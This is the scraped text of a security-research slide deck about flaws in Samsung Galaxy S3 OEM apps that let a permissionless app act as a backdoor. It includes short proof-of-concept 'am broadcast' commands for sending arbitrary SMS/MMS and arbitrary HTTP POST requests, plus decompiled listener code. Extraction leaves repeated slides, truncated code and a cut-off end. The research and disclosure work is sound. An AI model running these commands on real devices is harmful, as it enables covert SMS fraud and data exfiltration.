Upload
others
View
11
Download
0
Embed Size (px)
Citation preview
Android OEM’s applications (in)security andbackdoors without permission
André [email protected]
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Plan
1 Context and objectives
2 Android introduction
3 Android security model
4 Methodology
5 Toward a backdoor without permission
6 Post-exploitation
7 Scope of the vulnerabilities
8 Conclusion
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Context and objectives
Why Android?
Most used mobile OS
Security often questioned because of many malwares
Unofficial markets (warez)
Show off how an application without any permission can takecontrol of a smartphone
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Context and objectives
Targeted user
Security aware user
Doesn’t use alternative marketsChecks permissions before installing an application
Targeted smartphone
Samsung Galaxy S3 (I9300)
50 millions copies sold (March 2013)
Actually, the Samsung overlay on the I9300
Some of these applications may also be present on other modelsSome vulnerabilities may impact other models (S2, S4, Note 1/2, ...)The vulnerable applications can’t be deleted without root access
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Plan
1 Context and objectives
2 Android introduction
3 Android security model
4 Methodology
5 Toward a backdoor without permission
6 Post-exploitation
7 Scope of the vulnerabilities
8 Conclusion
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Plan
1 Context and objectives
2 Android introductionAndroid system and the applicationsClassical components of an Android applicationThe communication between componentsThe exposition of components
3 Android security model
4 Methodology
5 Toward a backdoor without permission
6 Post-exploitation
7 Scope of the vulnerabilities
8 Conclusion
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Android system and the applications
The Android system
Generalities and common knowledge
Mobile OS (smartphone/tablet) ”open source”
Based on Linux
Developed in C and Java
A special virtual machine: DalvikVM
Dalvik Bytecode (DEX/ODEX)
What is an Android application ?
APK file (actually a ZIP file)
APK’s most important files:
AndroidManifest.xml (configuration, permissions, components, ...)classes.dex (executable bytecode)Native libraries as .so files (JNI)
Each application has an unique name (packagename) and is signedby his developper (certificate)
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Classical components of an Android application
The applicative components
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Classical components of an Android application
The applicative components
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Classical components of an Android application
The applicative components
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Classical components of an Android application
The applicative components
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Classical components of an Android application
The applicative components
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Classical components of an Android application
The applicative components
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
The communication between components
The Intent: source of communication in Android
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
The communication between components
The Intent: source of communication in Android
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
The communication between components
The Intent: source of communication in Android
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
The communication between components
The Intent: source of communication in Android
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
The communication between components
The Intent: source of communication in Android
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
The exposition of components
Can we talk to this component?
exported or not, that’s the question
By default, components are not exported
Special case: ContentProvider
The component status, exported or not, is defined byAndroidManifest.xml
The attribute exported=[true|false]Presence of an intent-filter (the component is automaticallyexported)
A component can be exported but protected by a permission
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
The exposition of components
Example of AndroidManifest.xml
1 2 4 5 6 7 9
10 11 12 13 14 15 16 17 18 19 20 21 22
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
The exposition of components
Example of AndroidManifest.xml
1 2 4 5 6 7 9
10 11 12 13 14 15 16 17 18 19 20 21 22
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
The exposition of components
Example of AndroidManifest.xml
1 2 4 5 6 7 9
10 11 12 13 14 15 16 17 18 19 20 21 22
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
The exposition of components
Example of AndroidManifest.xml
1 2 4 5 6 7 9
10 11 12 13 14 15 16 17 18 19 20 21 22
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
The exposition of components
Example of AndroidManifest.xml
1 2 4 5 6 7 9
10 11 12 13 14 15 16 17 18 19 20 21 22
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
The exposition of components
Example of AndroidManifest.xml
1 2 4 5 6 7 9
10 11 12 13 14 15 16 17 18 19 20 21 22
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Plan
1 Context and objectives
2 Android introduction
3 Android security modelApplications isolationThe permission system
4 Methodology
5 Toward a backdoor without permission
6 Post-exploitation
7 Scope of the vulnerabilities
8 Conclusion
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Applications isolation
One user per application
Security by isolation
Default behaviour:
Each application has a dedicated user (and therefore an UID) on thesystem
Special case:
An application can ask to share an UID with another applicationsharedUserId mechanism (AndroidManifest.xml)In order to share an UID, 2 applications must be signed with thesame certificate
Consequences
Isolation between application in memory (process)
Isolation on the filesystem
Don’t protect against world readable/writeable files
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
The permission system
Application restrictions
Least privilege security
Permission to protect against dangerous actions:
SD card write access, INTERNET access, sending SMS, ...
By default, an application doesn’t have any permission
You need to ask for them explicitly in AndroidManifest.xml
Asked permissions are shown to the user at installationBoolean choice
A permission can protect:
Functions: AccountManager.getAccounts() (GET_ACCOUNTS)Intents: android.intent.action.CALL (CALL_PHONE)Components: content://contacts (READ_CONTACTS, ...)
A permission is given to an UID and not to a packagename
Permission model is applied on native code tooAll permissions of each application with the same sharedUserId arecombined
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
The permission system
Application restrictions
Consequences of the permission model
Components can be protected
The user ”knows”what the application can do when it is installed,thus the associated risks
Limit the impact in case of vulnerable application
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Plan
1 Context and objectives
2 Android introduction
3 Android security model
4 MethodologyA huge surface attackVulnerability research
5 Toward a backdoor without permission
6 Post-exploitation
7 Scope of the vulnerabilities
8 Conclusion
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
A huge surface attack
The attack surface
Important folders
We want to do a backdoor targeting an Android smartphone
Userland vulnerabilities (easy to find, easy to exploit)
Folders customized by constructors on an Android smartphone:
/system/app/system/framework/system/bin/system/lib
The content of these folders may change between operators
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
A huge surface attack
A huge surface attack
A large number of applications
Only two folders examined, but a consequent attack surface
216 APK in /system/app
To compare: 91 APK for the Nexus 4
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Vulnerability research
Automation
Constraints
Many application, need automation to find interesting applications
Then audit by hand (reverse engineering)
Exploitation of vulnerabilities with a little amount or no permissionat all
Creation of some scripts: ASA
Based on Androguard (great framework)
ASAManifest: Analyzes the manifest of an application and tellswhich components are exported and under what conditions
ASADatabase: Analyzes a large amount of applications likeASAManifest does and checks for sensitive API usage. The resultsare stored in MongoDB database.
ASADiff (ongoing): Diff between two versions of a system, byexample to detect vulnerability patching.
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Vulnerability research
ASAManifest
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Vulnerability research
ASADatabase: examples of queries on MongoDB
Applications with INSTALL PACKAGES permission
^^I^^I> db.gs3.find({permission:/INSTALL_PACKAGES/},{filename:1,_id:0})^^I^^I{ "filename" : "DttSupport.apk" }^^I^^I{ "filename" : "Kies.apk" }^^I^^I{ "filename" : "MtpApplication.apk" }^^I^^I{ "filename" : "PackageInstaller.apk" }^^I^^I[...]^^I^^I
Number of sharedUserId system applications
^^I^^I> db.gs3.find({"manifest.sharedUserId":"android.uid.system"},{}).count()^^I^^I41^^I^^I
Which one really use INSTALL PACKAGES ?
^^I^^I> db.gs3.find({permission:/INSTALL_PACKAGES/},{filename:1,_id:0}).count()^^I^^I11^^I^^I> db.gs3.find({permission:/INSTALL_PACKAGES/,use_installPackage:true},^^I^^I{filename:1,_id:0}).count()^^I^^I10^^I^^I> db.gs3.find({permission:/INSTALL_PACKAGES/,use_installPackage:false},^^I^^I{filename:1,_id:0})^^I^^I{ "filename" : "MtpApplication.apk" }^^I^^I
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Plan
1 Context and objectives
2 Android introduction
3 Android security model
4 Methodology
5 Toward a backdoor without permissionBackdoor’s featuresSD Card: Android and the retrocompatibility...SMS/MMS sending and files exfiltrationArbitrary HTTP requests executionGetting C.R.U.D rights on SMS/Contacts/Memo and moreSync for fun and profitI dont need root when i have system
6 Post-exploitation
7 Scope of the vulnerabilities
8 Conclusion
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Backdoor’s features
Objectives
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
SD Card: Android and the retrocompatibility...
SD Card: a protected storage?
Once upon a time... Android
First versions: total access to the SD Card
read & write access
Current state
Write access: WRITE EXTERNAL STORAGE
Read access: currently ”tolerated”without permission
Dangerous for user privacy (internet + sdcard)Introduction of the READ EXTERNAL STORAGE permission”Protect the SD Card” in system parameters (JB)
And what about the retrocompatibility?
From the android documentation, if minSdkVersion andtargetSdkVersion
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
SD Card: Android and the retrocompatibility...
SD Card: a protected storage?
Once upon a time... Android
First versions: total access to the SD Card
read & write access
Current state
Write access: WRITE EXTERNAL STORAGE
Read access: currently ”tolerated”without permission
Dangerous for user privacy (internet + sdcard)Introduction of the READ EXTERNAL STORAGE permission”Protect the SD Card” in system parameters (JB)
And what about the retrocompatibility?
From the android documentation, if minSdkVersion andtargetSdkVersion
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
SD Card: Android and the retrocompatibility...
SD Card: a protected storage?
Once upon a time... Android
First versions: total access to the SD Card
read & write access
Current state
Write access: WRITE EXTERNAL STORAGE
Read access: currently ”tolerated”without permission
Dangerous for user privacy (internet + sdcard)Introduction of the READ EXTERNAL STORAGE permission”Protect the SD Card” in system parameters (JB)
And what about the retrocompatibility?
From the android documentation, if minSdkVersion andtargetSdkVersion
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
SD Card: Android and the retrocompatibility...
Objectives
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
SMS/MMS sending and files exfiltration
Vuln1 - SecMms.apk
The malwares and premium SMS
Current Android malwares ask for the SEND SMS permission
Easily detectable and suspect for an userWhat about a malware which can send premium SMS without askingfor permission?
There is an app for that
SecMms.apk
exported BroadcastReceiver -> ui.MmsBGSenderAn well formatted Intent allows to send arbitrary SMS/MMS
PoC (attachments can also be added)
shell@android:/ $ am broadcast -a com.android.mms.QUICKSND --es mms_to "*PHONENUMBER*"--es mms_subject "*SUBJECT*" --es mms_text "*MESSAGE*"^^I^^I
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
SMS/MMS sending and files exfiltration
Vuln1 - SecMms.apk
The malwares and premium SMS
Current Android malwares ask for the SEND SMS permission
Easily detectable and suspect for an userWhat about a malware which can send premium SMS without askingfor permission?
There is an app for that
SecMms.apk
exported BroadcastReceiver -> ui.MmsBGSenderAn well formatted Intent allows to send arbitrary SMS/MMS
PoC (attachments can also be added)
shell@android:/ $ am broadcast -a com.android.mms.QUICKSND --es mms_to "*PHONENUMBER*"--es mms_subject "*SUBJECT*" --es mms_text "*MESSAGE*"^^I^^I
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
SMS/MMS sending and files exfiltration
Vuln1 - SecMms.apk
The malwares and premium SMS
Current Android malwares ask for the SEND SMS permission
Easily detectable and suspect for an userWhat about a malware which can send premium SMS without askingfor permission?
There is an app for that
SecMms.apk
exported BroadcastReceiver -> ui.MmsBGSenderAn well formatted Intent allows to send arbitrary SMS/MMS
PoC (attachments can also be added)
shell@android:/ $ am broadcast -a com.android.mms.QUICKSND --es mms_to "*PHONENUMBER*"--es mms_subject "*SUBJECT*" --es mms_text "*MESSAGE*"^^I^^I
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
SMS/MMS sending and files exfiltration
Objectives
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Arbitrary HTTP requests execution
Vuln2 - PCWClientS.apk
PCWReceiver
When an Intent is received withcom.sec.pcw.device.HTTP_REQUEST_RETRY as action
The body, uri and pushType attributed are extracted and anHTTP POST request is executed based on it
PoC
shell@android:/ $ am broadcast -a com.sec.pcw.device.HTTP_REQUEST_RETRY --es uri*URL* --es body *POST_DATA* --es pushType *PUSHTYPE*^^I
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Arbitrary HTTP requests execution
Objectives
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Getting C.R.U.D rights on SMS/Contacts/Memo and more
Vuln3 - wssyncmlnps.apk
Typical problems with constructor overlay
This vulnerability was patched by Samsung before we reported it
Patched on the S3 but not on the S2, Tab 1, Note 1
Special case: INTERNET permission is needed
creation of a socket
smlNpsReceiver
The application exports a BroadcastReceiver smlNpsReceiver
Answers to Intent related to Kiescom.intent.action.KIES WSSERVICE STARTcom.intent.action.KIES WSSERVICE START WIFI
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Getting C.R.U.D rights on SMS/Contacts/Memo and more
Vuln3 - wssyncmlnps.apk
smlNpsReceiver
1 public void onReceive(Context paramContext, Intent paramIntent)2 {3 [...]4 if(paramIntent.getAction().5 ^^Iequals("com.intent.action.KIES_WSSERVICE_START"))6 {7 ^^IsmlDebug.SML_DEBUG(2, "KIES_WSSERVICE_START");8 wifi_connected = false;9 ^^I usb_connected = true;
10 ^^IparamContext.stopService(11 ^^I new Intent(paramContext, smlNpsService.class)12 ^^I);13 ^^IparamContext.startService(14 ^^I new Intent(paramContext, smlNpsService.class)15 ^^I);16 }17 [...]18 }19 ^^I^^I
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Getting C.R.U.D rights on SMS/Contacts/Memo and more
Vuln3 - wssyncmlnps.apk
smlNpsReceiver
1 public void onReceive(Context paramContext, Intent paramIntent)2 {3 [...]4 if(paramIntent.getAction().5 ^^Iequals("com.intent.action.KIES_WSSERVICE_START"))6 {7 ^^IsmlDebug.SML_DEBUG(2, "KIES_WSSERVICE_START");8 wifi_connected = false;9 ^^I usb_connected = true;
10 ^^IparamContext.stopService(11 ^^I new Intent(paramContext, smlNpsService.class)12 ^^I);13 ^^IparamContext.startService(14 ^^I new Intent(paramContext, smlNpsService.class)15 ^^I);16 }17 [...]18 }19 ^^I^^I
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Getting C.R.U.D rights on SMS/Contacts/Memo and more
Vuln3 - wssyncmlnps.apk
smlNpsReceiver
1 public void onReceive(Context paramContext, Intent paramIntent)2 {3 [...]4 if(paramIntent.getAction().5 ^^Iequals("com.intent.action.KIES_WSSERVICE_START"))6 {7 ^^IsmlDebug.SML_DEBUG(2, "KIES_WSSERVICE_START");8 wifi_connected = false;9 ^^I usb_connected = true;
10 ^^IparamContext.stopService(11 ^^I new Intent(paramContext, smlNpsService.class)12 ^^I);13 ^^IparamContext.startService(14 ^^I new Intent(paramContext, smlNpsService.class)15 ^^I);16 }17 [...]18 }19 ^^I^^I
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Getting C.R.U.D rights on SMS/Contacts/Memo and more
Vuln3 - wssyncmlnps.apk
smlNpsReceiver
1 public void onReceive(Context paramContext, Intent paramIntent)2 {3 [...]4 if(paramIntent.getAction().5 ^^Iequals("com.intent.action.KIES_WSSERVICE_START"))6 {7 ^^IsmlDebug.SML_DEBUG(2, "KIES_WSSERVICE_START");8 wifi_connected = false;9 ^^I usb_connected = true;
10 ^^IparamContext.stopService(11 ^^I new Intent(paramContext, smlNpsService.class)12 ^^I);13 ^^IparamContext.startService(14 ^^I new Intent(paramContext, smlNpsService.class)15 ^^I);16 }17 [...]18 }19 ^^I^^I
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Getting C.R.U.D rights on SMS/Contacts/Memo and more
Vuln3 - wssyncmlnps.apk
smlNpsService
When it starts, it runs NpsServiceTask in a thread
Listens on 0.0.0.0:1108 (TCP)
Each connection is handled by smlNpsHandler in a separated thread
The method work() is called to handle the received data
http://www.quarkslab.com
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Getting C.R.U.D rights on SMS/Contacts/Memo and more
Vuln3 - wssyncmlnps.apk
smlNpsHandler.work()
1 protected void work()2 {3 if(this.socket != 0)4 {5 socketIS = this.socket.getInputStream();6 socketOS = this.socket.getOutputStream();7 cmdLine = this.readLine(socketIS);8 if((cmdLine != 0) && (cmdLine.length() != 0))9 {
10 cmdInformation = new String[3];11 v5 = cmdLine.indexOf("BEGIN");12 cmdInformation[0] = cmdLine.substring(0, 3);13 if(v5
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Getting C.R.U.D rights on SMS/Contacts/Memo and more
Vuln3 - wssyncmlnps.apk
smlNpsHandler.work()
1 protected void work()2 {3 if(this.socket != 0)4 {5 socketIS = this.socket.getInputStream();6 socketOS = this.socket.getOutputStream();7 cmdLine = this.readLine(socketIS);8 if((cmdLine != 0) && (cmdLine.length() != 0))9 {
10 cmdInformation = new String[3];11 v5 = cmdLine.indexOf("BEGIN");12 cmdInformation[0] = cmdLine.substring(0, 3);13 if(v5
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Getting C.R.U.D rights on SMS/Contacts/Memo and more
Vuln3 - wssyncmlnps.apk
smlNpsHandler.work()
1 protected void work()2 {3 if(this.socket != 0)4 {5 socketIS = this.socket.getInputStream();6 socketOS = this.socket.getOutputStream();7 cmdLine = this.readLine(socketIS);8 if((cmdLine != 0) && (cmdLine.length() != 0))9 {
10 cmdInformation = new String[3];11 v5 = cmdLine.indexOf("BEGIN");12 cmdInformation[0] = cmdLine.substring(0, 3);13 if(v5
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Getting C.R.U.D rights on SMS/Contacts/Memo and more
Vuln3 - wssyncmlnps.apk
smlNpsHandler.work()
1 protected void work()2 {3 if(this.socket != 0)4 {5 socketIS = this.socket.getInputStream();6 socketOS = this.socket.getOutputStream();7 cmdLine = this.readLine(socketIS);8 if((cmdLine != 0) && (cmdLine.length() != 0))9 {
10 cmdInformation = new String[3];11 v5 = cmdLine.indexOf("BEGIN");12 cmdInformation[0] = cmdLine.substring(0, 3);13 if(v5
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Getting C.R.U.D rights on SMS/Contacts/Memo and more
Vuln3 - wssyncmlnps.apk
smlNpsHandler.work()
1 protected void work()2 {3 if(this.socket != 0)4 {5 socketIS = this.socket.getInputStream();6 socketOS = this.socket.getOutputStream();7 cmdLine = this.readLine(socketIS);8 if((cmdLine != 0) && (cmdLine.length() != 0))9 {
10 cmdInformation = new String[3];11 v5 = cmdLine.indexOf("BEGIN");12 cmdInformation[0] = cmdLine.substring(0, 3);13 if(v5
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Android introduction Android security model Methodology Toward a backdoor without permission Post-exploitation
Getting C.R.U.D rights on SMS/Contacts/Memo and more
Vuln3 - wssyncmlnps.apk
smlNpsHandler.work()
